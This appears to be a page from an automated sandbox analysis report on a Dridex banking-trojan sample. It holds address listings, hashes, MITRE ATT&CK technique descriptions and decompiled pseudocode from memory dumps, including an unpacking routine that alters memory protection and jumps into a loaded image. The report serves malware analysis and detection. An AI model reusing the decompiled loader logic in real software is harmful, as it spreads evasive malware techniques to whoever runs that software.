0x72ae1c9c
0x72ae1c9f
0x72ae1ca1
0x72ae1cb8
0x72ae1cb8
0x72ae1ca3
0x72ae1ca7
0x72ae1cac
0x72ae1cac
0x72ae1cba
0x72ae1cc0
0x72ae1bdf
0x72ae1bdf
0x72ae1be1
0x72ae1be1
0x72ae1be3
0x72ae1be3
0x72ae1be8
0x00000000
0x00000000
0x72ae1bea
0x72ae1beb
0x72ae1bee
0x72ae1bf1
0x00000000
0x00000000
0x72ae1bfd
0x72ae1c00
0x72ae1c02
0x72ae1c19
0x72ae1c19
0x72ae1c04
0x72ae1c08
0x72ae1c0d
0x72ae1c0d
0x72ae1c26
0x72ae1c29
0x72ae1c32
0x72ae1c35
0x72ae1c58
0x72ae1c5c
0x00000000
0x72ae1c5c
0x72ae1c3d
0x72ae1c3d
0x72ae1c49
0x72ae1c4c
0x72ae1c55
0x00000000
0x72ae1c55
0x72ae1bcb
0x72ae1bdb
0x72ae1bdb
0x72ae1bdd
0x00000000
0x00000000
0x72ae1bd3
0x72ae1bd5
0x72ae1bd5
0x00000000
0x72ae1bdb
0x72ae1b8b
0x72ae1b93
0x72ae1bb3
0x72ae1b95
0x72ae1b95
0x72ae1b9d
0x72ae1ba6
0x72ae1ba6
0x72ae1b9d
0x00000000
0x72ae1b93
0x72ae1b04
0x72ae1b0b
0x00000000
0x00000000
0x72ae1b18
0x72ae1b1e
0x72ae1b23
0x72ae1b2a
0x72ae1b2e
0x72ae1b43
0x72ae1b45
0x72ae1b47
0x72ae1b4d
0x72ae1b5b
0x72ae1b5b
0x72ae1b61
0x00000000
0x72ae1b61
0x00000000
0x00000000
0x00000000
0x00000000
0x72ae1aab
0x72ae1aab
0x72ae1aab
0x72ae1aac
0x72ae1aaf
0x72ae1ab3
0x00000000
0x72ae1ac9
0x72ae1acc
0x72ae1acf
0x72ae1ad8
0x72ae1adb
0x72ae1adc
0x72ae1ade
0x00000000
0x72ae1519
0x72ae151b
0x72ae1520
0x72ae152b
0x72ae1539
0x72ae154c
0x72ae1559
0x72ae1562
0x72ae1566
0x72ae156a
0x72ae15b2
0x72ae15b2
0x72ae15b4
0x72ae15bb
0x00000000
0x00000000
0x72ae15d4
0x72ae15dc
0x72ae15e0
0x72ae15f5
0x72ae15f9
0x72ae15fd
0x72ae1606
0x72ae160c
0x72ae160f
0x72ae1613
0x72ae161b
0x72ae161d
0x72ae1621
0x72ae1628
0x72ae1631
0x72ae1631
0x72ae1635
0x72ae164a
0x72ae1660
0x72ae166d
0x72ae166e
0x72ae166e
0x72ae1670
0x00000000
0x00000000
0x00000000
0x00000000
0x72ae162a
0x72ae162a
0x72ae162a
0x72ae162b
0x72ae162c
0x00000000
0x72ae162a
0x72ae15ef
0x72ae15f3
0x00000000
0x00000000
0x00000000
0x72ae1674
0x72ae1674
0x72ae1675
0x72ae1678
0x72ae1682
0x72ae1682
0x72ae1686
0x72ae168d
0x72ae16e8
0x72ae16ed
0x72ae1740
0x72ae1740
0x72ae1744
0x72ae1748
0x72ae1572
0x72ae1575
0x72ae157a
0x72ae1580
0x72ae1583
0x72ae158a
0x72ae158e
0x72ae1595
0x72ae159e
0x72ae15a2
0x72ae15a6
0x72ae15ac
0x00000000
0x00000000
0x00000000
0x72ae15ac
0x72ae1752
0x72ae175e
0x72ae1769
0x72ae1770
0x72ae1779
0x72ae1783
0x72ae1784
0x72ae1792
0x72ae1797
0x72ae1798
0x72ae17a5
0x72ae17aa
0x72ae17bc
0x72ae17c1
0x72ae17c6
0x72ae17d8
0x72ae17ea
0x72ae17ef
0x72ae17fa
0x72ae1801
0x72ae1806
0x72ae180e
0x72ae1817
0x72ae1817
0x72ae1823
0x72ae182a
0x72ae1836
0x72ae1842
0x72ae1850
0x72ae1861
0x72ae1868
0x72ae186d
0x72ae1876
0x72ae187b
0x72ae187d
0x72ae1881
0x72ae1885
0x72ae1892
0x72ae189f
0x72ae18a3
0x72ae18b7
0x72ae18bb
0x00000000
0x00000000
0x72ae18d0
0x72ae18d2
0x72ae18da
0x72ae18d7
0x72ae18d7
0x72ae18d7
0x72ae18de
0x72ae18e0
0x72ae18e6
0x72ae18ec
0x72ae1948
0x72ae1951
0x72ae1955
0x72ae1962
0x72ae196b
0x72ae1970
0x72ae1974
0x72ae1977
0x72ae19d8
0x72ae19ee
0x72ae19f9
0x72ae19fa
0x72ae19fb
0x72ae19ff
0x72ae1a02
0x72ae1c82
0x72ae1c85
0x72ae1c85
0x00000000
0x72ae1a02
0x72ae1981
0x72ae1991
0x72ae199a
0x72ae19a3
0x72ae19ac
0x72ae19ad
0x72ae19ae
0x72ae19b3
0x72ae19bb
0x72ae19c3
0x00000000
0x00000000
0x00000000
0x72ae19c5
0x72ae18f5
0x72ae18fa
0x72ae18fe
0x72ae18fe
0x72ae1902
0x72ae1905
0x00000000
0x00000000
0x72ae1926
0x72ae1928
0x72ae192c
0x72ae192e
0x00000000
0x00000000
0x72ae1930
0x72ae1937
0x72ae1943
0x00000000
0x72ae1943
0x72ae190a
0x00000000
0x72ae1a08
0x72ae1a08
0x72ae1a09
0x72ae1a19
0x72ae1a25
0x72ae1a2e
0x72ae1a37
0x72ae1a40
0x00000000
0x72ae1a40
0x72ae16ef
0x72ae16f1
0x72ae16f3
0x72ae16f8
0x72ae16fd
0x72ae1710
0x72ae1726
0x72ae172f
0x72ae1730
0x72ae1730
0x72ae1732
0x72ae1733
0x72ae1736
0x72ae173a
0x00000000
0x72ae16f3
0x72ae168f
0x72ae1699
0x72ae169a
0x72ae169a
0x72ae16a7
0x72ae16b3
0x72ae16b5
0x72ae16b7
0x72ae16bb
0x72ae16cb
0x72ae16cb
0x72ae16d2
0x72ae16d5
0x72ae16d6
0x72ae16da
0x72ae16e4
0x00000000
0x72ae16e4

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72be1c8a96570dd94a0b768eabaeb6e9a436801bf7888eee2a271914bc53b907
Instruction ID: 5c0157af1670f6b3ad1b61ae12d6f9c922658b2fb39a013a3db35ee91e35e712
Opcode Fuzzy Hash: 72be1c8a96570dd94a0b768eabaeb6e9a436801bf7888eee2a271914bc53b907
Instruction Fuzzy Hash: E132AE709483458FC315DF28C981AAFBBF4FF98304F50896DE59687268EB70E946CB52

Uniqueness

Uniqueness Score: -1.00%

Function 72AD6DC8, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E72AD6DC8() {

				 *0x72aed280 = GetUserNameW;
				 *0x72AED284 = MessageBoxW;
				 *0x72AED288 = GetLastError;
				 *0x72AED28C = CreateFileA;
				 *0x72AED290 = DebugBreak;
				 *0x72AED294 = FlushFileBuffers;
				 *0x72AED298 = FreeEnvironmentStringsA;
				 *0x72AED29C = GetConsoleOutputCP;
				 *0x72AED2A0 = GetEnvironmentStrings;
				 *0x72AED2A4 = GetLocaleInfoA;
				 *0x72AED2A8 = GetStartupInfoA;
				 *0x72AED2AC = GetStringTypeA;
				 *0x72AED2B0 = HeapValidate;
				 *0x72AED2B4 = IsBadReadPtr;
				 *0x72AED2B8 = LCMapStringA;
				 *0x72AED2BC = LoadLibraryA;
				 *0x72AED2C0 = OutputDebugStringA;
				return 0x72aed280;
			}

0x72ad6dd9
0x72ad6de1
0x72ad6de4
0x72ad6df3
0x72ad6df6
0x72ad6e05
0x72ad6e08
0x72ad6e17
0x72ad6e1a
0x72ad6e29
0x72ad6e2c
0x72ad6e3b
0x72ad6e3e
0x72ad6e4d
0x72ad6e50
0x72ad6e5f
0x72ad6e62
0x72ad6e65

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23a30ca988a9c915e4629b029b196e3aa720b80b23652383b090924944db4b27
Instruction ID: 794b7a7d2ba0d010ee1a4f7f82164b8e1d071ad7b7090581afd294510ae0334b
Opcode Fuzzy Hash: 23a30ca988a9c915e4629b029b196e3aa720b80b23652383b090924944db4b27
Instruction Fuzzy Hash: 3411DFBAE95600CF8348CF0AD192A517BF2BB8C31032289AED8098B367D734D947CF54

Uniqueness

Uniqueness Score: -1.00%

Function 72ADBC00, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E72ADBC00(intOrPtr* __ecx) {
				void* _t1;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E72ADC33C(__ecx);
				if(_t1 != 0) {
					L4:
					return _t1;
				} else {
					_t1 = E72AE2F8C(0xa5eabdf8, 0x2c2324e8);
					if(_t1 == 0) {
						 *_t4 = 0;
						goto L4;
					} else {
						_push( *_t4);
						asm("int3");
						return _t1;
					}
				}
			}

0x72adbc01
0x72adbc03
0x72adbc0a
0x72adbc29
0x72adbc2a
0x72adbc0c
0x72adbc16
0x72adbc1d
0x72adbc23
0x00000000
0x72adbc1f
0x72adbc1f
0x72adbc21
0x72adbc22
0x72adbc22
0x72adbc1d

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction ID: 14e009d0e0ff29a77a8f0ca86a4004f7862314a8a7ccfc174c9cfde98d334f60
Opcode Fuzzy Hash: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction Fuzzy Hash: B2D0127214024277DF15173DFF40B15FBA96FC9255F540C5A55016B06DCFA680534165

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6692 Parent PID: 1416 rundll32.exeCOMMON

Executed Functions

Function 02B92213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E02B92213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0x2b94418 = 1;
				asm("movaps xmm0, [0x2b93010]");
				asm("movups [0x2b94428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E02B92569();
				E02B91D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E02B92569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0x2b94418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
						_v148 = _t234;
						_v152 = _v160 + 0x28;
						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E02B92569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x02b9221f
0x02b9222d
0x02b92234
0x02b92237
0x02b92241
0x02b92248
0x02b92252
0x02b92258
0x02b92261
0x02b9226a
0x02b9226d
0x02b92273
0x02b92277
0x02b9227f
0x02b92283
0x02b92286
0x02b92289
0x02b9228c
0x02b9228f
0x02b922a9
0x02b922af
0x02b922b2
0x02b922ba
0x02b922be
0x02b922c1
0x02b922c4
0x02b922c7
0x02b922ca
0x02b922e6
0x02b92303
0x02b92328
0x02b9232a
0x02b92333
0x02b92336
0x02b92340
0x02b92343
0x02b92346
0x02b92349
0x02b9234c
0x02b923a4
0x02b923a4
0x02b9254a
0x02b92550
0x02b9244d
0x02b92453
0x02b9249f
0x02b9249f
0x02b924bc
0x02b924e2
0x02b924f0
0x02b924f3
0x02b924f7
0x02b924fb
0x02b92502
0x02b92508
0x02b9250a
0x02b9251c
0x02b92524
0x02b9252a
0x02b92530
0x02b92536
0x00000000
0x00000000
0x02b9253c
0x02b9249f
0x02b9245b
0x02b92469
0x02b92471
0x02b92474
0x02b92476
0x02b9247c
0x02b92488
0x02b9248e
0x02b92491
0x02b92494
0x02b9238a
0x02b9238a
0x02b923d8
0x02b923de
0x02b923e4
0x02b923ea
0x02b923f0
0x02b923f5
0x02b923fb
0x02b923fe
0x02b92401
0x02b92409
0x02b92411
0x02b92414
0x02b92417
0x02b9241d
0x02b92423
0x02b9242e
0x02b92362
0x02b92368
0x02b92368
0x02b923c5

APIs

VirtualProtect.KERNELBASE ref: 02B9228F
VirtualProtect.KERNELBASE ref: 02B92328

Strings

t, xrefs: 02B92409

Memory Dump Source

Source File: 00000008.00000002.508888347.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: 61c9e755e6162070a1c946c4a505dfee3cb35d094dab66003dacef954801e753
Instruction ID: 0774b820814774761c14442bd52a3fd3b220196396d91aae6fe4c88257fe9fcc
Opcode Fuzzy Hash: 61c9e755e6162070a1c946c4a505dfee3cb35d094dab66003dacef954801e753
Instruction Fuzzy Hash: FD819AB4E042089FCB04CF99C590A9DFBF1FF88310F6585AAE958AB352D730A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02B92439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 02B92508

Memory Dump Source

Source File: 00000008.00000002.508888347.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0a1887574c9c38e637892f5fa757cac8251228e59768c1f4e3ca59d0b7aef409
Instruction ID: a6c6b149501dc9db039723a9ecef4e8f51076a90d2d9f03f3303c1e3fecf1946
Opcode Fuzzy Hash: 0a1887574c9c38e637892f5fa757cac8251228e59768c1f4e3ca59d0b7aef409
Instruction Fuzzy Hash: 5931E8B5D006289FDB14CF68C98069DB7F1BF89604F1586A9D94CA7306D731AE51CF81

Uniqueness

Uniqueness Score: -1.00%

Function 02B91D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 02B91EA8

Memory Dump Source

Source File: 00000008.00000002.508888347.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: cb0e96c7304068b4d713a8a5a3b507093117f7d3c509bdfb9a0669b5f076c16f
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: 7541D1B5E0421A8FDB04DFA8C4906AEBBF1FF48714F19856EE848AB340D775A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report RuRxpMUPN7

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 1416 Parent PID: 5676

General

Function 72AE07CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Function 72AD1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 72AE218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 72AE2790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 72AE3060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 72AE1140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Function 72AE5720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 72AE5AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 72AE5B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Function 72AE5B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Function 72AE5B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Function 72AE5B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Function 72AE5B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Function 72AE5D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 72AE10CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 72AE55B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 72AE5DF0, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 72AE3564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Function 72AD9144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Function 72ADA5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 72AE92DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 72AD84E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 72AE14D8, Relevance: .6, Instructions: 572
COMMONCrypto

Function 72AD6DC8, Relevance: .0, Instructions: 36
COMMON

Function 72ADBC00, Relevance: .0, Instructions: 16
COMMON

Function 02B92213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON